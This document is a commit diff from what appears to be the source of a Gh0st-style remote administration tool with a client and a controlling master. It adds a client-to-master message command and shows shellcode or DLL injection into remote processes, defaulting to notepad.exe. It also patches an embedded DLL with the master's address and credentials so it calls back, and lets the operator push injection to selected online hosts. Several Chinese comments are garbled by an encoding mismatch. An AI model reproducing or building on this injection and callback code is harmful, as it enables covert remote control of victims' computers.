Feature: Add command for client sending msg to master

2026-01-24 00:03:10 +08:00 · 2025-12-15 16:21:00 +01:00
parent 52239dbfba
commit 250ae09898
9 changed files with 77 additions and 16 deletions
--- a/client/ClientDll.cpp
+++ b/client/ClientDll.cpp
@@ -519,6 +519,7 @@ DWORD WINAPI StartClient(LPVOID lParam)
        LOGIN_INFOR login = GetLoginInfo(GetTickCount64() - dwTickCount, settings);
        while (ClientObject->IsRunning() && ClientObject->IsConnected() && !ClientObject->SendLoginInfo(login))
            WAIT_n(app.m_bIsRunning(&app), 5 + time(0)%10, 200);
        while (ClientObject->IsRunning() && ClientObject->IsConnected()) WAIT_n(app.m_bIsRunning(&app), 10, 200);
        do {
            Manager->SendHeartbeat();
--- a/client/IOCPClient.cpp
+++ b/client/IOCPClient.cpp
@@ -337,8 +337,10 @@ BOOL IOCPClient::ConnectServer(const char* szServerIP, unsigned short uPort)
    if (m_hWorkThread == NULL) {
 #ifdef _WIN32
        m_bIsRunning = TRUE;
        m_hWorkThread = (HANDLE)__CreateThread(NULL, 0, WorkThreadProc,(LPVOID)this, 0, NULL);
        m_bWorkThread = m_hWorkThread ? S_RUN : S_STOP;
        m_bIsRunning = m_hWorkThread ? TRUE : FALSE;
 #else
        pthread_t id = 0;
        m_hWorkThread = (HANDLE)pthread_create(&id, nullptr, (void* (*)(void*))IOCPClient::WorkThreadProc, this);
--- a/client/KernelManager.cpp
+++ b/client/KernelManager.cpp
@@ -141,7 +141,8 @@ typedef struct DllExecParam {
    DllExecuteInfo info;
    PluginParam param;
    BYTE* buffer;
-    DllExecParam(const DllExecuteInfo& dll, const PluginParam& arg, BYTE* data) : info(dll), param(arg)
+    CManager* manager;
    DllExecParam(const DllExecuteInfo& dll, const PluginParam& arg, BYTE* data, CManager* m) : info(dll), param(arg), manager(m)
    {
        buffer = new BYTE[info.Size];
        memcpy(buffer, data, info.Size);
@@ -180,6 +181,7 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
    DllExecParam* dll = (DllExecParam*)param;
    DllExecuteInfo info = dll->info;
    PluginParam pThread = dll->param;
    CManager* This = dll->manager;
 #ifdef _DEBUG
    WriteBinaryToFile((char*)dll->buffer, info.Size, info.Name);
    DllRunner* runner = new DefaultDllRunner(info.Name);
@@ -212,8 +214,12 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
        bool flag = info.CallType == CALLTYPE_IOCPTHREAD;
        ShellcodeInj inj(dll->buffer, info.Size, flag ? "run" : 0, flag ? &pThread : 0, flag ? sizeof(PluginParam) : 0);
        if (info.Pid < 0) info.Pid = GetCurrentProcessId();
-        bool ret = info.Pid ? inj.InjectProcess(info.Pid) : inj.InjectProcess("notepad.exe", true);
+        int ret = info.Pid ? inj.InjectProcess(info.Pid) : inj.InjectProcess("notepad.exe", true);
-        Mprintf("Inject %s to process [%d] %s\n", info.Name, info.Pid, ret ? "succeed" : "failed");
+        char buf[256];
        sprintf_s(buf, "Inject %s to process [%d] %s", info.Name, info.Pid ? info.Pid : ret, ret ? "succeed" : "failed");
        Mprintf("%s\n", buf);
        ClientMsg msg("代码注入", buf);
        This->SendData((LPBYTE)&msg, sizeof(msg));
    }
    SAFE_DELETE(dll);
    SAFE_DELETE(runner);
@@ -522,7 +528,7 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
        }
        if (data) {
            PluginParam param(m_conn->ServerIP(), m_conn->ServerPort(), &g_bExit, m_conn);
-            CloseHandle(__CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, data), 0, NULL));
+            CloseHandle(__CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, data, this), 0, NULL));
            Mprintf("Execute '%s'%d succeed - Length: %d\n", info->Name, info->CallType, info->Size);
        }
        break;
--- a/common/commands.h
+++ b/common/commands.h
@@ -268,6 +268,7 @@ enum {
    TOKEN_ERROR = 230,              // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ
    TOKEN_SHELL_DATA = 231,         // <20>ն˽<D5B6><CBBD><EFBFBD>
    CMD_EXECUTE_DLL = 240,			// ִ<>д<EFBFBD><D0B4><EFBFBD>
    TOKEN_CLIENT_MSG = 241,         // <20>ͻ<EFBFBD><CDBB><EFBFBD><EFBFBD><EFBFBD>Ϣ
 };
 enum MachineCommand {
@@ -1154,4 +1155,16 @@ typedef struct CharMsg {
    }
 }CharMsg;
 typedef struct ClientMsg {
    char cmd;
    char title[31];
    char text[512];
    ClientMsg() { memset(this, 0, sizeof(*this)); }
    ClientMsg(const char* title, const char* text) {
        cmd = TOKEN_CLIENT_MSG;
        strcpy_s(this->title, title ? title : "<EFBFBD><EFBFBD>ʾ<EFBFBD><EFBFBD>Ϣ");
        strcpy_s(this->text, text ? text : "");
    }
 }ClientMsg;
 #endif
--- a/server/2015Remote/2015Remote.rc
+++ b/server/2015Remote/2015Remote.rc
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -293,6 +293,22 @@ DllInfo* ReadTinyRunDll(int pid)
    std::string name = TINY_DLL_NAME;
    DWORD fileSize = 0;
    BYTE * dllData = ReadResource(IDR_TINYRUN_X64, fileSize);
    std::string s(skCrypt(FLAG_FINDEN)), ip, port;
    int offset = MemoryFind((char*)dllData, s.c_str(), fileSize, s.length());
    if (offset != -1) {
        std::string ip = THIS_CFG.GetStr("settings", "master", "");
        int nPort = THIS_CFG.Get1Int("settings", "ghost", ';', 6543);
        std::string master = ip.empty() ? "" : ip + ":" + std::to_string(nPort);
        CONNECT_ADDRESS* server = (CONNECT_ADDRESS*)(dllData + offset);
        if (!master.empty()) {
            splitIpPort(master, ip, port);
            server->SetServer(ip.c_str(), atoi(port.c_str()));
            server->SetAdminId(GetMasterHash().c_str());
            server->iType = CLIENT_TYPE_MEMDLL;
            server->parentHwnd = g_2015RemoteDlg ? (uint64_t)g_2015RemoteDlg->GetSafeHwnd() : 0;
            memcpy(server->pwdHash, GetPwdHash().c_str(), 64);
        }
    }
    // 设置输出参数
    auto md5 = CalcMD5FromBytes(dllData, fileSize);
    DllExecuteInfo info = { SHELLCODE, fileSize, CALLTYPE_DEFAULT, {}, {}, pid };
@@ -839,8 +855,8 @@ LRESULT CMy2015RemoteDlg::OnShowErrMessage(WPARAM wParam, LPARAM lParam)
    m_CList_Message.InsertItem(0, title ? *title : "操作错误");
    m_CList_Message.SetItemText(0, 1, strTime);
    m_CList_Message.SetItemText(0, 2, text ? *text : "内部错误");
-    delete title;
+    if(title)delete title;
-    delete text;
+    if(text)delete text;
    return S_OK;
 }
@@ -2226,6 +2242,11 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
    // 【L】：主机上下线和授权
    // 【x】：对话框相关功能
    switch (cmd) {
    case TOKEN_CLIENT_MSG: {
        ClientMsg *msg =(ClientMsg*)ContextObject->InDeCompressedBuffer.GetBuffer(0);
        PostMessageA(WM_SHOWERRORMSG, (WPARAM)new CString(msg->text), (LPARAM)new CString(msg->title));
        break;
    }
    case TOKEN_AUTH: {
        BOOL valid = FALSE;
        if (len > 20) {
@@ -4120,8 +4141,10 @@ void CMy2015RemoteDlg::OnOnlineInjNotepad()
 {
    auto tinyRun = ReadTinyRunDll(0);
    EnterCriticalSection(&m_cs);
-	for (auto i = m_HostList.begin(); i != m_HostList.end(); ++i) {
+    POSITION Pos = m_CList_Online.GetFirstSelectedItemPosition();
-		context* ctx = *i;
+    while (Pos) {
        int	iItem = m_CList_Online.GetNextSelectedItem(Pos);
        context* ctx = (context*)m_CList_Online.GetItemData(iItem);
        if (!ctx->IsLogin())
            continue;
        Buffer* buf = tinyRun->Data;
--- a/server/2015Remote/AudioDlg.h
+++ b/server/2015Remote/AudioDlg.h
@@ -21,7 +21,7 @@ public:
    static DWORD WINAPI WorkThread(LPVOID lParam);
-    void CAudioDlg::OnReceiveComplete(void);
+    void OnReceiveComplete(void);
 // <20>Ի<EFBFBD><D4BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
    enum { IDD = IDD_DIALOG_AUDIO };
--- a/server/2015Remote/IOCPServer.h
+++ b/server/2015Remote/IOCPServer.h
@@ -133,6 +133,16 @@ public:
    virtual ~CDialogBase() {}
 public:
    virtual BOOL ReceiveCommonMsg() {
        switch (m_ContextObject->InDeCompressedBuffer.GetBYTE(0)) {
        case TOKEN_CLIENT_MSG: {
            ClientMsg* msg = (ClientMsg*)m_ContextObject->InDeCompressedBuffer.GetBuffer(0);
            PostMessageA(WM_SHOWERRORMSG, (WPARAM)new CString(msg->text), (LPARAM)new CString(msg->title));
            return TRUE;
        }
        }
        return FALSE;
    }
    virtual void OnReceiveComplete(void) = 0;
    // <20><><EFBFBD><EFBFBD>Ϊ<EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD>ڽ<EFBFBD><DABD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
    void MarkReceiving(bool recv = true)
--- a/server/2015Remote/SettingDlg.cpp
+++ b/server/2015Remote/SettingDlg.cpp
@@ -139,6 +139,12 @@ BOOL CSettingDlg::OnInitDialog()
    BOOL frp = THIS_CFG.GetInt("frp", "UseFrp");
    ((CButton*)GetDlgItem(IDC_RADIO_FRP_OFF))->SetCheck(!frp);
    ((CButton*)GetDlgItem(IDC_RADIO_FRP_ON))->SetCheck(frp);
 #ifndef _WIN64
    GetDlgItem(IDC_RADIO_FRP_OFF)->EnableWindow(FALSE);
    GetDlgItem(IDC_RADIO_FRP_ON)->EnableWindow(FALSE);
    GetDlgItem(IDC_EDIT_FRP_PORT)->EnableWindow(FALSE);
    GetDlgItem(IDC_EDIT_FRP_TOKEN)->EnableWindow(FALSE);
 #endif
    m_nFrpPort = THIS_CFG.GetInt("frp", "server_port", 7000);
    m_sFrpToken = THIS_CFG.GetStr("frp", "token").c_str();